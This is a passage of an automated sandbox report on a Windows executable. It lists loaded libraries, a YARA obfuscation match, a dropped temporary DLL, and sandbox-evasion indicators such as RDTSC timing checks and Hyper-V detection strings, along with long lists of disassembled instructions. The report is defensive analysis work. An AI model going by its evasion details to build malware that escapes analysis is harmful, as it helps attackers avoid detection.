    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wkscli.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: 450707124374000811.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 450707124374000811.exe, 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3251140452.000000003576A000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249022839.00000000355BF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 450707124374000811.exe, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3251140452.000000003576A000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249022839.00000000355BF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    Source: Yara match, File source: 00000000.00000002.2851812607.0000000002C18000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591135D push eax; iretd 4_2_35911369
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35911FEC push eax; iretd 4_2_35911FED
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359127FA pushad ; ret 4_2_359127F9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591225F pushad ; ret 4_2_359127F9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359409AD push ecx; mov dword ptr [esp], ecx 4_2_359409B6
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591283D push eax; iretd 4_2_35912858
    Source: C:\Users\user\Desktop\450707124374000811.exe File created: C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\450707124374000811.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Saddukisk233\centerleder.ini count: 45722
    Source: C:\Users\user\Desktop\450707124374000811.exe API/Special instruction interceptor: Address: 31491AD
    Source: C:\Users\user\Desktop\450707124374000811.exe API/Special instruction interceptor: Address: 1D091AD
    Source: C:\Users\user\Desktop\450707124374000811.exe RDTSC instruction interceptor: First address: 310C9BB second address: 310C9BB instructions: 0x00000000 rdtsc; 0x00000002 cmp ebx, ecx; 0x00000004 jc 00007FBCC93D65E8h; 0x00000006 inc ebp; 0x00000007 inc ebx; 0x00000008 test al, dl; 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\450707124374000811.exe RDTSC instruction interceptor: First address: 1CCC9BB second address: 1CCC9BB instructions: 0x00000000 rdtsc; 0x00000002 cmp ebx, ecx; 0x00000004 jc 00007FBCC9187548h; 0x00000006 inc ebp; 0x00000007 inc ebx; 0x00000008 test al, dl; 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A116A6 rdtsc 4_2_35A116A6
    Source: C:\Users\user\Desktop\450707124374000811.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe API coverage: 0.2 %
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_004065C5 FindFirstFileW,FindClose, 0_2_004065C5
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405990
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_00402862 FindFirstFileW, 0_2_00402862
    Source: 450707124374000811.exe, 00000004.00000003.3249345138.0000000005702000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3584678772.0000000005702000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: 450707124374000811.exe, 00000004.00000003.3249602230.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249383270.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3584534506.00000000056C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
    Source: C:\Users\user\Desktop\450707124374000811.exe API call chain: ExitProcess graph end node graph_0-4599
    Source: C:\Users\user\Desktop\450707124374000811.exe API call chain: ExitProcess graph end node graph_0-4603
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A116A6 rdtsc 4_2_35A116A6
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359835C0 NtCreateMutant,LdrInitializeThunk, 4_2_359835C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CB594 mov eax, dword ptr fs:[00000030h] 4_2_359CB594
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A135B6 mov eax, dword ptr fs:[00000030h] 4_2_35A135B6
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593758F mov eax, dword ptr fs:[00000030h] 4_2_3593758F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FF5BE mov eax, dword ptr fs:[00000030h] 4_2_359FF5BE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359D35BA mov eax, dword ptr fs:[00000030h] 4_2_359D35BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DD5B0 mov eax, dword ptr fs:[00000030h] 4_2_359DD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359615A9 mov eax, dword ptr fs:[00000030h] 4_2_359615A9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359BD5D0 mov eax, dword ptr fs:[00000030h] 4_2_359BD5D0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359BD5D0 mov ecx, dword ptr fs:[00000030h] 4_2_359BD5D0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359695DA mov eax, dword ptr fs:[00000030h] 4_2_359695DA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359755C0 mov eax, dword ptr fs:[00000030h] 4_2_359755C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359615F4 mov eax, dword ptr fs:[00000030h] 4_2_359615F4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A155C9 mov eax, dword ptr fs:[00000030h] 4_2_35A155C9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A135D7 mov eax, dword ptr fs:[00000030h] 4_2_35A135D7
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35977505 mov eax, dword ptr fs:[00000030h] 4_2_35977505
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35977505 mov ecx, dword ptr fs:[00000030h] 4_2_35977505
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A15537 mov eax, dword ptr fs:[00000030h] 4_2_35A15537
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594D534 mov eax, dword ptr fs:[00000030h] 4_2_3594D534
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3597D530 mov eax, dword ptr fs:[00000030h] 4_2_3597D530
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FB52F mov eax, dword ptr fs:[00000030h] 4_2_359FB52F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359EF525 mov eax, dword ptr fs:[00000030h] 4_2_359EF525
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359EB550 mov eax, dword ptr fs:[00000030h] 4_2_359EB550
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3597B570 mov eax, dword ptr fs:[00000030h] 4_2_3597B570
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593B562 mov eax, dword ptr fs:[00000030h] 4_2_3593B562
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35949486 mov eax, dword ptr fs:[00000030h] 4_2_35949486
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593B480 mov eax, dword ptr fs:[00000030h] 4_2_3593B480
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359374B0 mov eax, dword ptr fs:[00000030h] 4_2_359374B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359734B0 mov eax, dword ptr fs:[00000030h] 4_2_359734B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359E74B0 mov eax, dword ptr fs:[00000030h] 4_2_359E74B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A114F6 mov eax, dword ptr fs:[00000030h] 4_2_35A114F6
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A154DB mov eax, dword ptr fs:[00000030h] 4_2_35A154DB
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359E94E0 mov eax, dword ptr fs:[00000030h] 4_2_359E94E0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C7410 mov eax, dword ptr fs:[00000030h] 4_2_359C7410
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3596340D mov eax, dword ptr fs:[00000030h] 4_2_3596340D
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FF453 mov eax, dword ptr fs:[00000030h] 4_2_359FF453
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359EB450 mov eax, dword ptr fs:[00000030h] 4_2_359EB450
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594B440 mov eax, dword ptr fs:[00000030h] 4_2_3594B440
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A1547F mov eax, dword ptr fs:[00000030h] 4_2_35A1547F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35941460 mov eax, dword ptr fs:[00000030h] 4_2_35941460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595F460 mov eax, dword ptr fs:[00000030h] 4_2_3595F460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FF78A mov eax, dword ptr fs:[00000030h] 4_2_359FF78A
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A137B6 mov eax, dword ptr fs:[00000030h] 4_2_35A137B6
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3596D7B0 mov eax, dword ptr fs:[00000030h] 4_2_3596D7B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h] 4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FD7B0 mov eax, dword ptr fs:[00000030h] 4_2_359FD7B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CF7AF mov eax, dword ptr fs:[00000030h] 4_2_359CF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C97A9 mov eax, dword ptr fs:[00000030h] 4_2_359C97A9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359457C0 mov eax, dword ptr fs:[00000030h] 4_2_359457C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594D7E0 mov ecx, dword ptr fs:[00000030h] 4_2_3594D7E0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3597F71F mov eax, dword ptr fs:[00000030h] 4_2_3597F71F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A0972B mov eax, dword ptr fs:[00000030h] 4_2_35A0972B
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35945702 mov eax, dword ptr fs:[00000030h] 4_2_35945702
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35947703 mov eax, dword ptr fs:[00000030h] 4_2_35947703
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A1B73C mov eax, dword ptr fs:[00000030h] 4_2_35A1B73C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35939730 mov eax, dword ptr fs:[00000030h] 4_2_35939730
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35975734 mov eax, dword ptr fs:[00000030h] 4_2_35975734
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594973A mov eax, dword ptr fs:[00000030h] 4_2_3594973A
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FF72E mov eax, dword ptr fs:[00000030h] 4_2_359FF72E
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35943720 mov eax, dword ptr fs:[00000030h] 4_2_35943720
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595F720 mov eax, dword ptr fs:[00000030h] 4_2_3595F720
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359E375F mov eax, dword ptr fs:[00000030h] 4_2_359E375F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35953740 mov eax, dword ptr fs:[00000030h] 4_2_35953740
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A13749 mov eax, dword ptr fs:[00000030h] 4_2_35A13749
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593B765 mov eax, dword ptr fs:[00000030h] 4_2_3593B765
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C368C mov eax, dword ptr fs:[00000030h] 4_2_359C368C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359376B2 mov eax, dword ptr fs:[00000030h] 4_2_359376B2
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593D6AA mov eax, dword ptr fs:[00000030h] 4_2_3593D6AA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594B6C0 mov eax, dword ptr fs:[00000030h] 4_2_3594B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FF6C7 mov eax, dword ptr fs:[00000030h] 4_2_359FF6C7
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359716CF mov eax, dword ptr fs:[00000030h] 4_2_359716CF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A016CC mov eax, dword ptr fs:[00000030h] 4_2_35A016CC
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FD6F0 mov eax, dword ptr fs:[00000030h] 4_2_359FD6F0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359D36EE mov eax, dword ptr fs:[00000030h] 4_2_359D36EE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3596D6E0 mov eax, dword ptr fs:[00000030h] 4_2_3596D6E0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359736EF mov eax, dword ptr fs:[00000030h] 4_2_359736EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35943616 mov eax, dword ptr fs:[00000030h] 4_2_35943616
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35971607 mov eax, dword ptr fs:[00000030h] 4_2_35971607
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3597F603 mov eax, dword ptr fs:[00000030h] 4_2_3597F603
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35A15636 mov eax, dword ptr fs:[00000030h] 4_2_35A15636
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h] 4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35979660 mov eax, dword ptr fs:[00000030h]4_2_35979660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35979660 mov eax, dword ptr fs:[00000030h]4_2_35979660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DD660 mov eax, dword ptr fs:[00000030h]4_2_359DD660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35997190 mov eax, dword ptr fs:[00000030h]4_2_35997190
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5180 mov eax, dword ptr fs:[00000030h]4_2_359F5180
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5180 mov eax, dword ptr fs:[00000030h]4_2_359F5180
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595B1B0 mov eax, dword ptr fs:[00000030h]4_2_3595B1B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F11A4 mov eax, dword ptr fs:[00000030h]4_2_359F11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F11A4 mov eax, dword ptr fs:[00000030h]4_2_359F11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F11A4 mov eax, dword ptr fs:[00000030h]4_2_359F11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F11A4 mov eax, dword ptr fs:[00000030h]4_2_359F11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A131E1 mov eax, dword ptr fs:[00000030h]4_2_35A131E1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597D1D0 mov eax, dword ptr fs:[00000030h]4_2_3597D1D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597D1D0 mov ecx, dword ptr fs:[00000030h]4_2_3597D1D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E71F9 mov esi, dword ptr fs:[00000030h]4_2_359E71F9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A151CB mov eax, dword ptr fs:[00000030h]4_2_35A151CB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451ED mov eax, dword ptr fs:[00000030h]4_2_359451ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A17120 mov eax, dword ptr fs:[00000030h]4_2_35A17120
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941131 mov eax, dword ptr fs:[00000030h]4_2_35941131
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941131 mov eax, dword ptr fs:[00000030h]4_2_35941131
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B136 mov eax, dword ptr fs:[00000030h]4_2_3593B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B136 mov eax, dword ptr fs:[00000030h]4_2_3593B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B136 mov eax, dword ptr fs:[00000030h]4_2_3593B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B136 mov eax, dword ptr fs:[00000030h]4_2_3593B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947152 mov eax, dword ptr fs:[00000030h]4_2_35947152
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939148 mov eax, dword ptr fs:[00000030h]4_2_35939148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939148 mov eax, dword ptr fs:[00000030h]4_2_35939148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939148 mov eax, dword ptr fs:[00000030h]4_2_35939148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939148 mov eax, dword ptr fs:[00000030h]4_2_35939148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D3140 mov eax, dword ptr fs:[00000030h]4_2_359D3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D3140 mov eax, dword ptr fs:[00000030h]4_2_359D3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D3140 mov eax, dword ptr fs:[00000030h]4_2_359D3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D9179 mov eax, dword ptr fs:[00000030h]4_2_359D9179
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15152 mov eax, dword ptr fs:[00000030h]4_2_35A15152
